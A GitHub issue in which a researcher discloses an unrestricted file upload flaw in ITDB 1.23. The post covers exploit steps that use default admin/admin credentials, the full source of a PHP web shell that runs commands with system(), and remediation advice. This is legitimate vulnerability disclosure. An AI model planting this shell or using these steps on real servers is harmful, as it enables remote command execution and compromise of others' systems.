search

sivann / itdb

IT Items Database
http://www.sivann.gr/software/itdb/
GNU General Public License v3.0
153 stars 104 forks source link

I Found The Security Issue #69

Open rungga opened 7 years ago

rungga commented 7 years ago

Hey Sivann,

I found the security issue / vulnerability on ITDB application. I have sent Proof of Concept to your email "sivann@gmail.com".

is it possible if I post the vulnerability in here?

rungga commented 7 years ago

PoC ITDB - Unrestricted File Upload.pdf

Exploit Title: Unrestricted File Upload Vulnerability on ITDB (IT ITems DataBase) Application Date: Sept 07th, 2017 Exploit Author: @rungga_reksya Vendor Homepage: http://www.sivann.gr/software/itdb/ Software Link: https://github.com/sivann/itdb/archive/master.zip Version: 1.23 Tested on: Windows Server 2008 R2  CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)

I. Application Background: ITDB is a web based asset inventory management tool used to store information about assets found in office environments, with a focus -but not lmited to- IT assets. It is not or targets for ITIL/CMDB compliance (yet), but it has served me for years and hopefully it will do the same for you :-) ITDB comes with sources and is distributed under the GNU Public license. 

II. Vulnerability Description: Unrestricted file upload vulnerability in “Add File” menu at ITDB version 1.23 allows authenticated with type account is “Full Access or Read” to upload malicious code (shell) with extension is “php”.

III. Exploit: If we refer to file “00-INSTALL.txt” which is username and password default “admin/admin”. Example Attacker got admin privilege and login as admin into ITDB application. Then Attacker access to “Add File” menu and Upload a File your shell (shellcmd.php), and then click Save —> Bingo Success

Directory Listing at “http://target.com/itdb-directory/data/files/“ 

Check your shell on field “Filename” and access your shell like this: http://target.com/[itdb-directory]/data/files/yourshell.php?cmd=whoami

script for shellcmd.php

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

======

IV. Remediation: Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like .htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the files within it are not executable. If possible, rename the files that are uploaded. (source: https://www.acunetix.com/vulnerabilities/web/unrestricted-file-upload)

Content-type Verification: This kind of verification completely depends upon content-type header, e.g. Content-Type: image/jpeg, containing the MIME type. This is a very weak validation mechanism, as this header is supplied by the user or attacker. (source: https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)

V. Proof of Concept:

Admin Privilege (Full Access)

1 2 3 4

Low User (Read Only)

screen shot 2017-09-08 at 07 28 22 screen shot 2017-09-08 at 07 28 57 screen shot 2017-09-08 at 07 29 05 screen shot 2017-09-08 at 07 29 28 screen shot 2017-09-08 at 07 30 02